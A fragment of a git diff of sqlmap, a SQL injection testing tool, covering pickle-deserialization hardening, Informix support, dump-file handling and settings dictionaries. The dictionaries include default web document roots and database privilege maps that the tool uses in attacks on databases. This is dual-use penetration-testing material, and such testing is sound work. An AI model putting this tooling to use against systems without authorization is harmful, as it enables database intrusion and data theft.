+from lib.core.settings import PICKLE_REDUCE_WHITELIST def base64decode(value): """ @@ -38,7 +47,7 @@ def base64pickle(value): Serializes (with pickle) and encodes to Base64 format supplied (binary) value >>> base64pickle('foobar') - 'gAJVBmZvb2JhcnEALg==' + 'gAJVBmZvb2JhcnEBLg==' """ retVal = None @@ -57,20 +66,36 @@ def base64pickle(value): return retVal -def base64unpickle(value): +def base64unpickle(value, unsafe=False): """ Decodes value from Base64 to plain format and deserializes (with pickle) its content - >>> base64unpickle('gAJVBmZvb2JhcnEALg==') + >>> base64unpickle('gAJVBmZvb2JhcnEBLg==') 'foobar' """ retVal = None + def _(self): + if len(self.stack) > 1: + func = self.stack[-2] + if func not in PICKLE_REDUCE_WHITELIST: + raise Exception, "abusing reduce() is bad, Mkay!" + self.load_reduce() + + def loads(str): + f = StringIO.StringIO(str) + if unsafe: + unpickler = picklePy.Unpickler(f) + unpickler.dispatch[picklePy.REDUCE] = _ + else: + unpickler = pickle.Unpickler(f) + return unpickler.load() + try: - retVal = pickle.loads(base64decode(value)) + retVal = loads(base64decode(value)) except TypeError: - retVal = pickle.loads(base64decode(bytes(value))) + retVal = loads(base64decode(bytes(value))) return retVal @@ -143,6 +168,10 @@ def htmlunescape(value): if value and isinstance(value, basestring): codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&')) retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal) + try: + retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal) + except ValueError: + pass return retVal def singleTimeWarnMessage(message): # Cross-linked function diff --git a/lib/core/data.py b/lib/core/data.py index bb45072ff..c7bd39feb 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 29295727b..10251f389 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,15 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import copy import types -from lib.core.exception import SqlmapDataException - class AttribDict(dict): """ This class defines the sqlmap object, inheriting from Python data @@ -43,7 +41,7 @@ class AttribDict(dict): try: return self.__getitem__(item) except KeyError: - raise SqlmapDataException("unable to access item '%s'" % item) + raise AttributeError("unable to access item '%s'" % item) def __setattr__(self, item, value): """ @@ -93,6 +91,7 @@ class InjectionDict(AttribDict): self.prefix = None self.suffix = None self.clause = None + self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888 # data is a dict with various stype, each which is a dict with # all the information specific for that stype diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 8fa7b03b1..283259d09 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -15,10 +15,13 @@ def cachedmethod(f, cache={}): def 
_(*args, **kwargs): try: key = (f, tuple(args), frozenset(kwargs.items())) + if key not in cache: + cache[key] = f(*args, **kwargs) except: key = "".join(str(_) for _ in (f, args, kwargs)) - if key not in cache: - cache[key] = f(*args, **kwargs) + if key not in cache: + cache[key] = f(*args, **kwargs) + return cache[key] return _ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 6adecbe25..036debe9a 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,17 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.datatype import AttribDict _defaults = { - "csvDel": ",", + "csvDel": ',', "timeSec": 5, "googlePage": 1, - "cpuThrottle": 5, "verbose": 1, "delay": 0, "timeout": 30, @@ -22,7 +21,7 @@ _defaults = { "risk": 1, "dumpFormat": "CSV", "tech": "BEUSTQ", - "torType": "HTTP", + "torType": "SOCKS5", } defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index b6a0ea2ba..dd681a09a 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -21,218 +21,268 @@ from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES FIREBIRD_TYPES = { - "261": "BLOB", - "14": "CHAR", - "40": "CSTRING", - "11": "D_FLOAT", - "27": "DOUBLE", - "10": "FLOAT", - "16": "INT64", - "8": "INTEGER", - "9": "QUAD", - "7": "SMALLINT", - "12": "DATE", - "13": "TIME", - "35": "TIMESTAMP", - "37": "VARCHAR", - } + 261: "BLOB", + 14: "CHAR", + 40: "CSTRING", + 11: "D_FLOAT", + 27: "DOUBLE", + 10: "FLOAT", + 16: "INT64", + 8: "INTEGER", + 9: "QUAD", + 7: "SMALLINT", + 12: "DATE", + 13: "TIME", + 35: "TIMESTAMP", + 37: "VARCHAR", +} + +INFORMIX_TYPES = { + 0: "CHAR", + 1: "SMALLINT", + 2: "INTEGER", + 3: "FLOAT", + 4: "SMALLFLOAT", + 5: "DECIMAL", + 6: "SERIAL", + 7: "DATE", + 8: "MONEY", + 9: "NULL", + 10: "DATETIME", + 11: "BYTE", + 12: "TEXT", + 13: "VARCHAR", + 14: "INTERVAL", + 15: "NCHAR", + 16: "NVARCHAR", + 17: "INT8", + 18: "SERIAL8", + 19: "SET", + 20: "MULTISET", + 21: "LIST", + 22: "ROW (unnamed)", + 23: "COLLECTION", + 40: "Variable-length opaque type", + 41: "Fixed-length opaque type", + 43: "LVARCHAR", + 45: "BOOLEAN", + 52: "BIGINT", + 53: "BIGSERIAL", + 2061: "IDSSECURITYLABEL", + 4118: "ROW (named)", +} SYBASE_TYPES = { - "14": "floatn", - "8": "float", - "15": "datetimn", - "12": "datetime", - "23": "real", - "28": "numericn", - "10": "numeric", - "27": "decimaln", - "26": "decimal", - "17": "moneyn", - "11": "money", - "21": "smallmoney", - "22": "smalldatetime", - "13": "intn", - "7": "int", - "6": "smallint", - "5": "tinyint", - "16": "bit", - "2": "varchar", - "18": "sysname", - "25": "nvarchar", - "1": "char", - "24": "nchar", - "4": "varbinary", - "80": "timestamp", - "3": "binary", - "19": "text", - "20": "image", - } + 14: "floatn", + 8: "float", + 15: "datetimn", + 12: "datetime", + 23: "real", + 28: "numericn", + 10: "numeric", + 27: "decimaln", + 26: "decimal", + 17: "moneyn", + 11: "money", + 21: "smallmoney", + 22: "smalldatetime", + 13: "intn", + 7: "int", + 6: "smallint", + 5: 
"tinyint", + 16: "bit", + 2: "varchar", + 18: "sysname", + 25: "nvarchar", + 1: "char", + 24: "nchar", + 4: "varbinary", + 80: "timestamp", + 3: "binary", + 19: "text", + 20: "image", +} MYSQL_PRIVS = { - 1: "select_priv", - 2: "insert_priv", - 3: "update_priv", - 4: "delete_priv", - 5: "create_priv", - 6: "drop_priv", - 7: "reload_priv", - 8: "shutdown_priv", - 9: "process_priv", - 10: "file_priv", - 11: "grant_priv", - 12: "references_priv", - 13: "index_priv", - 14: "alter_priv", - 15: "show_db_priv", - 16: "super_priv", - 17: "create_tmp_table_priv", - 18: "lock_tables_priv", - 19: "execute_priv", - 20: "repl_slave_priv", - 21: "repl_client_priv", - 22: "create_view_priv", - 23: "show_view_priv", - 24: "create_routine_priv", - 25: "alter_routine_priv", - 26: "create_user_priv", - } + 1: "select_priv", + 2: "insert_priv", + 3: "update_priv", + 4: "delete_priv", + 5: "create_priv", + 6: "drop_priv", + 7: "reload_priv", + 8: "shutdown_priv", + 9: "process_priv", + 10: "file_priv", + 11: "grant_priv", + 12: "references_priv", + 13: "index_priv", + 14: "alter_priv", + 15: "show_db_priv", + 16: "super_priv", + 17: "create_tmp_table_priv", + 18: "lock_tables_priv", + 19: "execute_priv", + 20: "repl_slave_priv", + 21: "repl_client_priv", + 22: "create_view_priv", + 23: "show_view_priv", + 24: "create_routine_priv", + 25: "alter_routine_priv", + 26: "create_user_priv", +} PGSQL_PRIVS = { - 1: "createdb", - 2: "super", - 3: "catupd", - } + 1: "createdb", + 2: "super", + 3: "catupd", +} # Reference(s): http://stackoverflow.com/a/17672504 # http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES FIREBIRD_PRIVS = { - "S": "SELECT", - "I": "INSERT", - "U": "UPDATE", - "D": "DELETE", - "R": "REFERENCE", - "E": "EXECUTE", - "X": "EXECUTE", - "A": "ALL", - "M": "MEMBER", - "T": "DECRYPT", - "E": "ENCRYPT", - "B": "SUBSCRIBE", - } + "S": "SELECT", + "I": "INSERT", + "U": "UPDATE", + "D": "DELETE", + "R": "REFERENCE", + "X": "EXECUTE", + "A": "ALL", + "M": "MEMBER", + "T": "DECRYPT", + "E": "ENCRYPT", + "B": "SUBSCRIBE", +} + +# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm +# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm + +INFORMIX_PRIVS = { + "D": "DBA (all privileges)", + "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)", + "C": "CONNECT (work with existing tables)", + "G": "ROLE", + "U": "DEFAULT (implicit connection)", +} DB2_PRIVS = { - 1: "CONTROLAUTH", - 2: "ALTERAUTH", - 3: "DELETEAUTH", - 4: "INDEXAUTH", - 5: "INSERTAUTH", - 6: "REFAUTH", - 7: "SELECTAUTH", - 8: "UPDATEAUTH", - } + 1: "CONTROLAUTH", + 2: "ALTERAUTH", + 3: "DELETEAUTH", + 4: "INDEXAUTH", + 5: "INSERTAUTH", + 6: "REFAUTH", + 7: "SELECTAUTH", + 8: "UPDATEAUTH", +} DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} DBMS_DICT = { - DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"), - DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"), - DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), - DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"), - DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"), - DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"), - DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", 
"http://kinterbasdb.sourceforge.net/", "firebird"), - DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), - DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"), - DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"), - DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), - } + DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"), + DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"), + DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), + DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"), + DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"), + DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"), + DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), + DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), + DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), + DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), + DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), +} FROM_DUMMY_TABLE = { - DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects", - DBMS.FIREBIRD: " FROM RDB$DATABASE", - DBMS.MAXDB: " FROM VERSIONS", - DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", - DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS" - } + DBMS.ORACLE: " FROM DUAL", + DBMS.ACCESS: " FROM MSysAccessObjects", + DBMS.FIREBIRD: " FROM RDB$DATABASE", + DBMS.MAXDB: " FROM VERSIONS", + DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", + DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS", + DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL" +} SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", ), - "SQL data definition": ( - "create ", - "declare ", - "drop ", - "truncate ", - "alter ", ), + "SQL data definition": ( + "create ", + "declare ", + "drop ", + "truncate ", + "alter ", ), - "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), + "SQL data manipulation": ( + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "load ", ), - "SQL data control": ( - "grant ", - "revoke ", ), + "SQL data control": ( + "grant ", + "revoke ", ), - "SQL data execution": ( - "exec ", - "execute ", - "values ", - "call ", ), + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", ), - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), - } + "SQL transaction": ( + "start transaction ", + 
"begin work ", + "begin transaction ", + "commit ", + "rollback ", ), +} POST_HINT_CONTENT_TYPES = { - POST_HINT.JSON: "application/json", - POST_HINT.JSON_LIKE: "application/json", - POST_HINT.MULTIPART: "multipart/form-data", - POST_HINT.SOAP: "application/soap+xml", - POST_HINT.XML: "application/xml", - POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", - } + POST_HINT.JSON: "application/json", + POST_HINT.JSON_LIKE: "application/json", + POST_HINT.MULTIPART: "multipart/form-data", + POST_HINT.SOAP: "application/soap+xml", + POST_HINT.XML: "application/xml", + POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", +} DEPRECATED_OPTIONS = { - "--replicate": "use '--dump-format=SQLITE' instead", - "--no-unescape": "use '--no-escape' instead", - "--binary": "use '--binary-fields' instead", - "--check-payload": None, - "--check-waf": None, - } + "--replicate": "use '--dump-format=SQLITE' instead", + "--no-unescape": "use '--no-escape' instead", + "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", + "--check-payload": None, + "--check-waf": None, + "--pickled-options": "use '--api -c ...' instead", +} DUMP_DATA_PREPROCESS = { - DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 - DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, - } + DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 + DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, +} DEFAULT_DOC_ROOTS = { - OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"), - OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout - } + OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"), + OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout +} diff --git a/lib/core/dump.py b/lib/core/dump.py index 4401f1742..108f806b2 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,12 +9,15 @@ import cgi import hashlib import os import re +import shutil import tempfile import threading from lib.core.common import Backend +from lib.core.common import checkFile from lib.core.common import dataToDumpFile from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isListLike from lib.core.common import normalizeUnicode @@ -36,6 +39,7 @@ from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapSystemException from lib.core.replication import Replication +from lib.core.settings import DUMP_FILE_BUFFER_SIZE from lib.core.settings import HTML_DUMP_CSS_STYLE from lib.core.settings import IS_WIN from lib.core.settings import METADB_SUFFIX @@ -59,7 +63,7 @@ class Dump(object): self._lock = threading.Lock() def _write(self, data, newline=True, console=True, content_type=None): - if hasattr(conf, "api"): + if conf.api: dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE) return @@ -74,7 +78,7 @@ class 
Dump(object): try: self._outputFP.write(text) except IOError, ex: - errMsg = "error occurred while writing to log file ('%s')" % ex.message + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) if kb.get("multiThreadMode"): @@ -94,7 +98,7 @@ class Dump(object): try: self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % ex.message + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) def getOutputFile(self): @@ -106,7 +110,7 @@ class Dump(object): def string(self, header, data, content_type=None, sort=True): kb.stickyLevel = None - if hasattr(conf, "api"): + if conf.api: self._write(data, content_type=content_type) return @@ -115,9 +119,15 @@ class Dump(object): elif data is not None: _ = getUnicode(data) - if _ and _[-1] == '\n': + if _.endswith("\r\n"): + _ = _[:-2] + + elif _.endswith("\n"): _ = _[:-1] + if _.strip(' '): + _ = _.strip(' ') + if "\n" in _: self._write("%s:\n---\n%s\n---" % (header, _)) else: @@ -134,7 +144,7 @@ class Dump(object): except: pass - if hasattr(conf, "api"): + if conf.api: self._write(elements, content_type=content_type) return @@ -159,7 +169,7 @@ class Dump(object): def currentDb(self, data): if Backend.isDbms(DBMS.MAXDB): self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) @@ -183,7 +193,7 @@ class Dump(object): users = userSettings.keys() users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - if hasattr(conf, "api"): + if conf.api: self._write(userSettings, content_type=content_type) return @@ -217,7 +227,7 @@ class Dump(object): def dbTables(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): + if conf.api: self._write(dbTables, content_type=CONTENT_TYPE.TABLES) return @@ -260,7 +270,7 @@ class Dump(object): def dbTableColumns(self, tableColumns, content_type=None): if isinstance(tableColumns, dict) and len(tableColumns) > 0: - if hasattr(conf, "api"): + if conf.api: self._write(tableColumns, content_type=content_type) return @@ -334,7 +344,7 @@ class Dump(object): def dbTablesCount(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): + if conf.api: self._write(dbTables, content_type=CONTENT_TYPE.COUNT) return @@ -393,17 +403,11 @@ class Dump(object): db = "All" table = tableValues["__infos__"]["table"] - if hasattr(conf, "api"): + if conf.api: self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) return - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db))) - if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) - dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) - warnFile = True - else: - dumpDbPath = os.path.join(conf.dumpPath, _) + dumpDbPath = os.path.join(conf.dumpPath, 
unsafeSQLIdentificatorNaming(db)) if conf.dumpFormat == DUMP_FORMAT.SQLITE: replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) @@ -411,33 +415,65 @@ class Dump(object): if not os.path.isdir(dumpDbPath): try: os.makedirs(dumpDbPath, 0755) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapdb") - except IOError, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) + except: + warnFile = True - warnMsg = "unable to create dump directory " - warnMsg += "'%s' (%s). " % (dumpDbPath, ex) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) + _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) + dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) - dumpDbPath = tempDir + if not os.path.isdir(dumpDbPath): + try: + os.makedirs(dumpDbPath, 0755) + except Exception, ex: + try: + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + except IOError, _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) - if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) - dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) - warnFile = True + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). 
" % (dumpDbPath, getSafeExString(ex)) + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warn(warnMsg) + + dumpDbPath = tempDir + + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())) + if not checkFile(dumpFileName, False): + try: + openFile(dumpFileName, "w+b").close() + except SqlmapSystemException: + raise + except: + warnFile = True + + _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: + _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) + dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) + else: + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) else: - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) + appendToFile = any((conf.limitStart, conf.limitStop)) - appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop)) - dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab") + if not appendToFile: + count = 1 + while True: + candidate = "%s.%d" % (dumpFileName, count) + if not checkFile(candidate, False): + try: + shutil.copyfile(dumpFileName, candidate) + except IOError: + pass + finally: + break + else: + count += 1 + + dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE) count = int(tableValues["__infos__"]["count"]) separator = str() @@ -577,7 +613,8 @@ class Dump(object): if not os.path.isdir(dumpDbPath): os.makedirs(dumpDbPath, 0755) - filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (unsafeSQLIdentificatorNaming(column), randomInt(8))) + _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) logger.warn(warnMsg) @@ -629,17 +666,17 @@ class Dump(object): logger.warn(msg) def dbColumns(self, dbColumnsDict, colConsider, dbs): - if hasattr(conf, "api"): + if conf.api: self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) return for column in dbColumnsDict.keys(): if colConsider == "1": - colConsiderStr = "s like '%s' were" % unsafeSQLIdentificatorNaming(column) + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) else: colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) - msg = "Column%s found in the " % colConsiderStr + msg = "column%s found in the " % colConsiderStr msg += "following databases:" self._write(msg) diff --git a/lib/core/enums.py b/lib/core/enums.py index cb1b7b36f..9339b8ed4 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -34,6 +34,7 @@ class DBMS: SQLITE = "SQLite" SYBASE = "Sybase" HSQLDB = "HSQLDB" + INFORMIX = "Informix" class DBMS_DIRECTORY_NAME: ACCESS = "access" @@ -47,6 +48,7 @@ class DBMS_DIRECTORY_NAME: SQLITE = "sqlite" SYBASE = "sybase" HSQLDB = "hsqldb" + INFORMIX = "informix" class CUSTOM_LOGGING: PAYLOAD = 9 @@ -81,7 +83,7 @@ class HTTPMETHOD: POST = "POST" HEAD = "HEAD" PUT = "PUT" - DELETE = "DETELE" + DELETE = "DELETE" TRACE = "TRACE" OPTIONS = 
"OPTIONS" CONNECT = "CONNECT" @@ -164,19 +166,24 @@ class HTTP_HEADER: CONTENT_RANGE = "Content-Range" CONTENT_TYPE = "Content-Type" COOKIE = "Cookie" - SET_COOKIE = "Set-Cookie" + EXPIRES = "Expires" HOST = "Host" + IF_MODIFIED_SINCE = "If-Modified-Since" + LAST_MODIFIED = "Last-Modified" LOCATION = "Location" PRAGMA = "Pragma" PROXY_AUTHORIZATION = "Proxy-Authorization" PROXY_CONNECTION = "Proxy-Connection" RANGE = "Range" REFERER = "Referer" + REFRESH = "Refresh" # Reference: http://stackoverflow.com/a/283794 SERVER = "Server" - USER_AGENT = "User-Agent" + SET_COOKIE = "Set-Cookie" TRANSFER_ENCODING = "Transfer-Encoding" URI = "URI" + USER_AGENT = "User-Agent" VIA = "Via" + X_POWERED_BY = "X-Powered-By" class EXPECTED: BOOL = "bool" @@ -190,6 +197,8 @@ class OPTION_TYPE: class HASHDB_KEYS: DBMS = "DBMS" + DBMS_FORK = "DBMS_FORK" + CHECK_WAF_RESULT = "CHECK_WAF_RESULT" CONF_TMP_PATH = "CONF_TMP_PATH" KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" @@ -197,6 +206,7 @@ class HASHDB_KEYS: KB_CHARS = "KB_CHARS" KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" KB_INJECTIONS = "KB_INJECTIONS" + KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" OS = "OS" @@ -277,31 +287,32 @@ class WEB_API: JSP = "jsp" class CONTENT_TYPE: - TECHNIQUES = 0 - DBMS_FINGERPRINT = 1 - BANNER = 2 - CURRENT_USER = 3 - CURRENT_DB = 4 